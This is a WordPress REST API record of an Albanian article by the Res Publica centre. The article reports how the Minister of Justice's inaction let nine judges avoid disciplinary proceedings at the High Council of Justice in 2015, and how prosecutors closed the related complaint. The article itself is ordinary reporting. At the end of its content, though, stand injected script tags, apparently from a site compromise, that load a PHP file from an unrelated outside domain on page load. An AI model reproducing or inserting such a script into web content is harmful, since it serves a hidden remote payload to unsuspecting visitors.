{"id":1136,"date":"2016-04-02T16:47:35","date_gmt":"2016-04-02T14:47:35","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1136"},"modified":"2016-04-02T23:02:55","modified_gmt":"2016-04-02T21:02:55","slug":"si-shpetuan-9-gjyqtare-nga-procedimi-disiplinor-ne-kld-gjate-vitit-2015","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1136","title":{"rendered":"Si shp\u00ebtuan 9 gjyqtar\u00eb nga procedimi disiplinor n\u00eb KLD gjat\u00eb vitit 2015"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/shatteredgavel\/\" rel=\"attachment wp-att-1139\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft size-medium wp-image-1139\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/shatteredgavel-300x194.jpg\" alt=\"shatteredgavel\" width=\"300\" height=\"194\" \/><\/a>N\u00eb nj\u00eb nga mbledhjet e K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb n\u00eb muajin shkurt t\u00eb vitit 2015, Ministri i Drejt\u00ebsis\u00eb u pyet nga Presidenti i Republik\u00ebs n\u00eb lidhje me depozitimin e disa praktive t\u00eb shkeljeve disiplinore nga disa gjyqtar\u00eb. Sipas Presidentit t\u00eb Republik\u00ebs rezultonte se kishte kaluar afati 1 vje\u00e7ar i shqyrtimit t\u00eb shkeljeve disiplinore p\u00ebr gjyqtar\u00ebt Sh.P., A.C., I.P., E.M., A.Y. dhe B.M, duke k\u00ebrkuar informacion nga Ministri i Drejt\u00ebsis\u00eb p\u00ebr k\u00ebt\u00eb problem. Ministri u shpreh se p\u00ebr nj\u00ebrin rast nuk kishte marr\u00eb t\u00eb gjitha materialet dhe kishte b\u00ebr\u00eb nj\u00eb kallzim penal n\u00eb Prokurorin\u00eb e Rrethit Tiran\u00eb, nd\u00ebrsa p\u00ebr rastet e tjera k\u00ebrkoi koh\u00eb p\u00ebr t\u00eb dh\u00ebn\u00eb shpjegime <a href=\"http:\/\/www.kld.al\/vendime\/2015\/procesverbale-2015\/procesverbal-dat%C3%AB-04-02-2015\">(shih procesverbalin e mbledhjes s\u00eb KLD dt. 04.02.2015)<\/a>. N\u00eb mbledhjet e tjera n\u00eb vazhdim nuk u dhan\u00eb shpjegime nga Ministri.<\/p>\n<p>P\u00ebr ta kuptuar m\u00eb mir\u00eb situat\u00ebn, ligji p\u00ebrcakton se procedimet disiplinore ndaj gjyqtar\u00ebve i nis ekskluzivisht vet\u00ebm Ministri i Drejt\u00ebsis\u00eb dhe ky i fundit duhet t\u00eb d\u00ebrgoj\u00eb dosjen n\u00eb KLD brenda 1 viti nga momenti i konstatimit t\u00eb shkeljes. Pas k\u00ebtij afati, n\u00ebse nuk veprohet nga Ministri, dosja mbyllet dhe gjyqtari nuk procedohet.<\/p>\n<p>N\u00eb nj\u00eb takim n\u00eb Maj 2015, kur po diskutohej raporti i qendr\u00ebs Res Publica mbi veprimtarin\u00eb e KLD, nj\u00eb p\u00ebrfaq\u00ebsuese e Ministris\u00eb s\u00eb Drejt\u00ebsis\u00eb shpjegoi se p\u00ebr disa nga k\u00ebto raste \u00ebsht\u00eb konstatuar q\u00eb dokumentat kan\u00eb humbur n\u00eb ministri dhe p\u00ebr k\u00ebt\u00eb arsye Ministri i Drejt\u00ebsis\u00eb ka b\u00ebr\u00eb kallzim penal.<\/p>\n<p>N\u00eb vijim t\u00eb monitorimit t\u00eb KLD-s\u00eb nga qendra Res Publica, me mb\u00ebshtetjen e Fondacionit Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb, u sigurua informacion n\u00eb rrug\u00eb zyrtare nga Ministria e Drejt\u00ebsis\u00eb q\u00eb Prokuroria e Rrethit Gjyq\u00ebsor Tiran\u00eb kishte vendosur pushimin e \u00e7\u00ebshtjes <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/Prgj-179.1.pdf\">(shih dokumentin) <\/a>me k\u00ebt\u00eb arsyetimin se n\u00eb analiz\u00eb t\u00eb provave t\u00eb administruara \u00e7mohet se fakti nuk parashikohet nga ligji si vep\u00ebr penale. Nga ana e inspektor\u00ebve t\u00eb Ministrit t\u00eb Drejt\u00ebsis\u00eb rezulton t\u00eb jen\u00eb kryer t\u00eb gjitha veprimet p\u00ebr \u00e7\u00ebshtjet q\u00eb i jan\u00eb ngarkuar p\u00ebr ndjekje, p\u00ebrfshir\u00eb njoftimin e gjyqtar\u00ebve dhe p\u00ebrpilimin e Memove drejtuar Ministrit t\u00eb Drejt\u00ebsis\u00eb. Sipas Prokuroris\u00eb, neni 34 i ligjit 9877 p\u00ebrcakton se t\u00eb drejt\u00ebn p\u00ebr nisjen e procedimit disiplinor ndaj gjyqtarit n\u00eb K\u00ebshillin e Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb e ka Ministri i Drejt\u00ebsis\u00eb. Ky p\u00ebrcaktim l\u00eb n\u00eb diskrecion t\u00eb plot\u00eb t\u00eb Ministrit t\u00eb Drejt\u00ebsis\u00eb nisjen ose jo t\u00eb procedimit disiplinor ndaj gjyqtarit n\u00eb KLD. N\u00eb k\u00ebto rrethana kjo kompetenc\u00eb e Ministrit t\u00eb Drejt\u00ebsis\u00eb, e shprehur n\u00eb mos nisjen e nj\u00eb procedimi disiplinor ndaj nj\u00eb gjyqtari, nuk pasjell n\u00eb asnj\u00eb rast p\u00ebrgjegj\u00ebsi penale.<\/p>\n<p>Pra, pas hetimit u konstatua se dokumentat nuk kishin humbur dhe se inspektor\u00ebt e akuzuar i kishin dor\u00ebzuar materialet n\u00eb adres\u00ebn e duhur, te Ministri i Drejt\u00ebsis\u00eb. Ishte pik\u00ebrisht Ministri q\u00eb nuk kishte vepruar p\u00ebr t\u00eb d\u00ebrguar n\u00eb KLD 6 gjyqtar\u00ebt e kapur me shkelje.<\/p>\n<p>Gjat\u00eb vitit 2015 konstatohet se Ministri i Drejt\u00ebsis\u00eb ka vendosur mosfillimin e procedimit disiplinor edhe p\u00ebr 2 gjyqtar\u00eb t\u00eb tjer\u00eb, sic raporton Inspektoriati i KLD-s\u00eb <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/Prgj-KLD-193.1.pdf\">(shih dokumentin)<\/a>, nd\u00ebrsa n\u00eb nj\u00eb rast, p\u00ebr gjyqtaren P.A., Ministri e ka d\u00ebrguar \u00e7\u00ebshtjen me 1 vit e 8 muaj m\u00eb von\u00eb (p\u00ebrtej afatit ligjor), duke b\u00ebr\u00eb q\u00eb KLD t\u00eb rr\u00ebzoj\u00eb k\u00ebrkes\u00ebn p\u00ebr shkak t\u00eb kalimit t\u00eb afateve <a href=\"http:\/\/www.kld.al\/vendime\/2015\/vendim-nr-22,-dat%C3%AB-03-03-2015\">(shih vendimin nr. 22\/2015 t\u00eb KLD)<\/a>.<\/p>\n<p>Shqet\u00ebsues \u00ebsht\u00eb fakti q\u00eb disa gjyqtar\u00eb, megjith\u00ebse konstatohet q\u00eb kan\u00eb kryer shkelje t\u00eb ndryshme, nuk procedohen p\u00ebr shkak t\u00eb mosveprimit t\u00eb Ministrit t\u00eb Drejt\u00ebsis\u00eb. Por, m\u00eb shqet\u00ebsues \u00ebsht\u00eb fakti q\u00eb Prokuroria nuk nis dot hetime ndaj Ministrit, sepse ligji e ka p\u00ebrcaktuar k\u00ebt\u00eb kompetenc\u00eb si t\u00eb drejt\u00eb t\u00eb ministrit dhe jo si detyr\u00eb t\u00eb tij, duke mos e konsideruar problemin n\u00eb fjal\u00eb si nj\u00eb mosp\u00ebrmbushje t\u00eb rregullt t\u00eb detyr\u00ebs.<\/p>\n<p>P\u00ebr k\u00ebto arsye, nj\u00eb prej sfidave m\u00eb t\u00eb m\u00ebdha q\u00eb duhet t\u00eb zgjidh\u00eb Reforma p\u00ebr Drejt\u00ebsi \u00ebsht\u00eb edhe ngarkimi me p\u00ebrgjegj\u00ebsi ligjore p\u00ebr organin q\u00eb do t\u00eb ket\u00eb kompetenc\u00ebn p\u00ebr t\u00eb nisur procedimet ndaj gjyqtar\u00ebve n\u00eb KLD.<\/p>\n<p><em>Res Publica<\/em><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb nj\u00eb nga mbledhjet e K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb n\u00eb muajin shkurt t\u00eb vitit 2015, Ministri i Drejt\u00ebsis\u00eb u [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1139,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[11,10,12,13,14],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1136"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1136"}],"version-history":[{"count":2,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1136\/revisions"}],"predecessor-version":[{"id":1141,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1136\/revisions\/1141"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1139"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}